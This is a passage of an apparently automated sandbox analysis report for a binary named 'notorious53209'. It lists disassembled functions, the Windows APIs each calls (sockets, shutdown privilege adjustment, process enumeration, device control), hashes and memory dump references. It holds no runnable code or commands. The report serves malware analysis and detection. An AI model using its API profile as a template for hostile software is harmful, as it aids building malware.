                                                  • Opcode Fuzzy Hash: b93f0816b15e780ddf6f3fbdf06535aeb8a53211460819fd18b23ab3e35204d8
                                                  • Instruction Fuzzy Hash: 2C41907190025AAFCF11EF65CC85AEEBBB4FF06310F144566E914E21A1EB309E44CF91
                                                  Function 0090D74C Relevance: 12.3, APIs: 8, Instructions: 257windownativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • GetSystemMetrics.USER32(0000000F), ref: 0090D78A
                                                  • GetSystemMetrics.USER32(0000000F), ref: 0090D7AA
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000), ref: 0090D9E5
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0090DA03
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0090DA24
                                                  • ShowWindow.USER32(00000003,00000000), ref: 0090DA43
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 0090DA68
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0090DA8B
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
                                                  • String ID:
                                                  • API String ID: 830902736-0
                                                  • Opcode ID: e7d54546bd56ca5288f8ec1da3fc0e588154f41a3b14c9d30968e63149b3aca7
                                                  • Instruction ID: 2dacf28dacbd89d48c97aa66b1a203fbf307424370e562bdf57a414584d95f78
                                                  • Opcode Fuzzy Hash: e7d54546bd56ca5288f8ec1da3fc0e588154f41a3b14c9d30968e63149b3aca7
                                                  • Instruction Fuzzy Hash: EEB19A75601229EFDF14CFA8C9857BE7BB5FF44701F088069EC589B295D734AA90CB90
                                                  Function 00894140 Relevance: 11.6, APIs: 1, Strings: 5, Instructions: 1132COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                                  • API String ID: 0-1546025612
                                                  • Opcode ID: 18ccd95921ea49dc9d6658f1763f6187ee1f5b20e138cdf97cf2dc537eb7ffd0
                                                  • Instruction ID: 6353fd4004a49c266cf5c6ce89cece58ec30df9a8dbaf5cca02dddd68a68ffc9
                                                  • Opcode Fuzzy Hash: 18ccd95921ea49dc9d6658f1763f6187ee1f5b20e138cdf97cf2dc537eb7ffd0
                                                  • Instruction Fuzzy Hash: 9BA26C70A0421ECBDF24DF58C990BADB7B1FB54314F2891AAD85AE7280D7349E86DF50
                                                  Function 008958C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: e0c8388e8e6d892c37b77fd54e82051eba4cc58a712d97f51995ae33da64a306
                                                  • Instruction ID: 3c6bb2b24976a4cfc95846c0c2880f1b3b3b261115abe78e2a23a86c2481fbcd
                                                  • Opcode Fuzzy Hash: e0c8388e8e6d892c37b77fd54e82051eba4cc58a712d97f51995ae33da64a306
                                                  • Instruction Fuzzy Hash: 7B129C70A00609EFDF14EFA8D985AAEB7F5FF48300F14462AE406E7291EB35AD11CB51
                                                  Function 0090C27C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                    • Part of subcall function 00882344: GetCursorPos.USER32(?), ref: 00882357
                                                    • Part of subcall function 00882344: ScreenToClient.USER32(009467B0,?), ref: 00882374
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000001), ref: 00882399
                                                    • Part of subcall function 00882344: GetAsyncKeyState.USER32(00000002), ref: 008823A7
                                                  • ReleaseCapture.USER32 ref: 0090C2F0
                                                  • SetWindowTextW.USER32(?,00000000), ref: 0090C39A
                                                  • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0090C3AD
                                                  • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 0090C48F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                  • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                  • API String ID: 973565025-2107944366
                                                  • Opcode ID: 28cb6d1de840808662dd58b8a7237225e1fff936ff75d36cc59a28cc21c760d7
                                                  • Instruction ID: f36fc1ad19be2ce0bf327de800fd1009fe703ccbdc32f9c0af9444594d04ebfe
                                                  • Opcode Fuzzy Hash: 28cb6d1de840808662dd58b8a7237225e1fff936ff75d36cc59a28cc21c760d7
                                                  • Instruction Fuzzy Hash: C751ABB4208304AFD714EF24CC95FAA7BE5FB89314F004A2DF5918B2E1DB71A948DB52
                                                  Function 008E545F Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 008D8D0D
                                                    • Part of subcall function 008D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 008D8D3A
                                                    • Part of subcall function 008D8CC3: GetLastError.KERNEL32 ref: 008D8D47
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 008E549B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: a22b19db7ab0bbcafad9bd29bc8a1c10c6267730727cb5cce1115c8beb706ada
                                                  • Instruction ID: 56cb1578e5df8416e2cda65237d2f3acdd379b4d7035f371e9c8147061e4e638
                                                  • Opcode Fuzzy Hash: a22b19db7ab0bbcafad9bd29bc8a1c10c6267730727cb5cce1115c8beb706ada
                                                  • Instruction Fuzzy Hash: F70147B1669A496EF738627ADC5ABBA7258FB0274EF200131FC06D20C3DA504C808299
                                                  Function 008F6596 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 008F65EF
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F65FE
                                                  • bind.WS2_32(00000000,?,00000010), ref: 008F661A
                                                  • listen.WS2_32(00000000,00000005), ref: 008F6629
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F6643
                                                  • closesocket.WS2_32(00000000), ref: 008F6657
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: 7e66cc691d148d46ec8120397635a1f7522af823076ba2796deff5b6ca1cf172
                                                  • Instruction ID: 666ef59afa52ee669cd77615881adc9146e0a5339c170b1967188963dccbc568
                                                  • Opcode Fuzzy Hash: 7e66cc691d148d46ec8120397635a1f7522af823076ba2796deff5b6ca1cf172
                                                  • Instruction Fuzzy Hash: B7219C312002189FCB10EF68CC95B7EB7A9FF48720F148269EA56E73D1DB74AD119B52
                                                  Function 00895680 Relevance: 8.0, APIs: 5, Instructions: 516COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008A0FF6: std::exception::exception.LIBCMT ref: 008A102C
                                                    • Part of subcall function 008A0FF6: __CxxThrowException@8.LIBCMT ref: 008A1041
                                                  • _memmove.LIBCMT ref: 008D062F
                                                  • _memmove.LIBCMT ref: 008D0744
                                                  • _memmove.LIBCMT ref: 008D07EB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1300846289-0
                                                  • Opcode ID: 0b5cdb850ba627759c77a02dd7ace1811839669ce13358d3d2f60cb0ccae7124
                                                  • Instruction ID: 5184199f539f31c4f2265cc596a3bcc12804596a7620a512589f1cabe14a97e5
                                                  • Opcode Fuzzy Hash: 0b5cdb850ba627759c77a02dd7ace1811839669ce13358d3d2f60cb0ccae7124
                                                  • Instruction Fuzzy Hash: 1D026F70A00209EBDF15EF68D985AAE7BB5FF44300F14816AE806EB355EB31DA51CF91
                                                  Function 00881287 Relevance: 7.9, APIs: 5, Instructions: 379nativeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 008819FA
                                                  • GetSysColor.USER32(0000000F), ref: 00881A4E
                                                  • SetBkColor.GDI32(?,00000000), ref: 00881A61
                                                    • Part of subcall function 00881290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 008812D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ColorDialogNtdllProc_$LongWindow
                                                  • String ID:
                                                  • API String ID: 591255283-0
                                                  • Opcode ID: 1d3feafff87b1d8234a88034533146eb255147fc51862139d6c233c9cf4ebb70
                                                  • Instruction ID: 567748f7d4e11a7d2fc75ba7b60fe36b4f552089b85af8b2fa6373268a6e6aec
                                                  • Opcode Fuzzy Hash: 1d3feafff87b1d8234a88034533146eb255147fc51862139d6c233c9cf4ebb70
                                                  • Instruction Fuzzy Hash: C6A116B1116568BEDE3CBB28CC5DEBB399CFB82759B14021AF402D62D2DE549D039372
                                                  Function 008F6A5A Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 008F80A0: inet_addr.WS2_32(00000000), ref: 008F80CB
                                                  • socket.WS2_32(00000002,00000002,00000011), ref: 008F6AB1
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F6ADA
                                                  • bind.WS2_32(00000000,?,00000010), ref: 008F6B13
                                                  • WSAGetLastError.WS2_32(00000000), ref: 008F6B20
                                                  • closesocket.WS2_32(00000000), ref: 008F6B34
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: 4d5af192f901f5c9f02595347a3e0693bd8d465c4b6d61d3bb95afdd9c842b9f
                                                  • Instruction ID: f0fe22ede7d23ad6a7c39010756491a8fef9f0fabe8e83aaddd3bb4528cefa54
                                                  • Opcode Fuzzy Hash: 4d5af192f901f5c9f02595347a3e0693bd8d465c4b6d61d3bb95afdd9c842b9f
                                                  • Instruction Fuzzy Hash: 0741A275600214AFEB10BF68DC86F7E77A9FB44720F448158FA5AEB3D2DA709D018792
                                                  Function 009055FD Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: 8493f23afef624424a713ca8e4ee36dfb3c02a76856367c7018c599e51c73760
                                                  • Instruction ID: f0f083a82193cec9d8fa22e8d2a4e609d0dac43c137d98f2fd579798047a5cfd
                                                  • Opcode Fuzzy Hash: 8493f23afef624424a713ca8e4ee36dfb3c02a76856367c7018c599e51c73760
                                                  • Instruction Fuzzy Hash: EF11C4323009256FE7216F26DC54A2F7B9CFF84721B464429F846D7281CB319E01CEA5
                                                  Function 00893190 Relevance: 6.6, APIs: 4, Instructions: 587COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf
                                                  • String ID:
                                                  • API String ID: 674341424-0
                                                  • Opcode ID: 329dcf747255ade4db14e321275ec9542491c678f231d6a1e2005965fef9a624
                                                  • Instruction ID: 0f64f7cce2e68cd74034a9c6162d10fdafa6899310514f84197411b6a2a13578
                                                  • Opcode Fuzzy Hash: 329dcf747255ade4db14e321275ec9542491c678f231d6a1e2005965fef9a624
                                                  • Instruction Fuzzy Hash: 362268716083019FDB24EF68C881B6AB7E4FF88704F18491DF59AD7291DB71EA04CB92
                                                  Function 008FF121 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 008FF151
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 008FF15F
                                                    • Part of subcall function 00887F41: _memmove.LIBCMT ref: 00887F82
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 008FF21F
                                                  • CloseHandle.KERNEL32(00000000), ref: 008FF22E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
                                                  • Opcode ID: c0c8477061badb01978f2a7bd3a611b96b33de05f746efaeeb68c448cf54bd48
                                                  • Instruction ID: eeb23ea4bb59cb64b4c3d1844afae1e77c74e00bd917dc20586f8228e50e3678
                                                  • Opcode Fuzzy Hash: c0c8477061badb01978f2a7bd3a611b96b33de05f746efaeeb68c448cf54bd48
                                                  • Instruction Fuzzy Hash: A7515B715083109FD310EF24D885A6BB7E8FF94710F14482DF595D6252EB70AA08CB92
                                                  Function 0090C788 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00882612: GetWindowLongW.USER32(?,000000EB), ref: 00882623
                                                  • GetCursorPos.USER32(?), ref: 0090C7C2
                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0090C7D7
                                                  • GetCursorPos.USER32(?), ref: 0090C824
                                                  • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,008BBBFB,?,?,?), ref: 0090C85E
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000935000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.000000000093F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000963000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.359219028.0000000000999000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.360959227.000000000099F000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361008876.00000000009A0000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.361018085.00000000009E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_880000_notorious53209.jbxd
                                                  Similarity
                                                  • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                  • String ID:
                                                  • API String ID: 1423138444-0
                                                  • Opcode ID: 9a873de91660995fc552ca4fddba86b5be3a8a4436953283530ba0ed4236af59
                                                  • Instruction ID: b22ce8627c4a416aca894e493d5f774d3a599564d6a03dd1fb409bf7a282b5b9
                                                  • Opcode Fuzzy Hash: 9a873de91660995fc552ca4fddba86b5be3a8a4436953283530ba0ed4236af59
                                                  • Instruction Fuzzy Hash: 7E317175600118BFCB25CF58CC98EEA7BBAEF4A710F048169F9058B2A1D7319D50EB65
                                                  Function 008E40B1 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 008E40D1
                                                  • _memset.LIBCMT ref: 008E40F2
                                                  • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008E4144
                                                  • CloseHandle.KERNEL32(00000000), ref: 008E414D
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.359219028.0000000000881000.00000040.00000001.01000000.00000004.sdmp, Offset: 00880000, based on PE: true
                                                  • Associated: 00000005.00000002.358825241.0000000000880000.00000002.00000001.01000000.00000004.sdmpDownload File
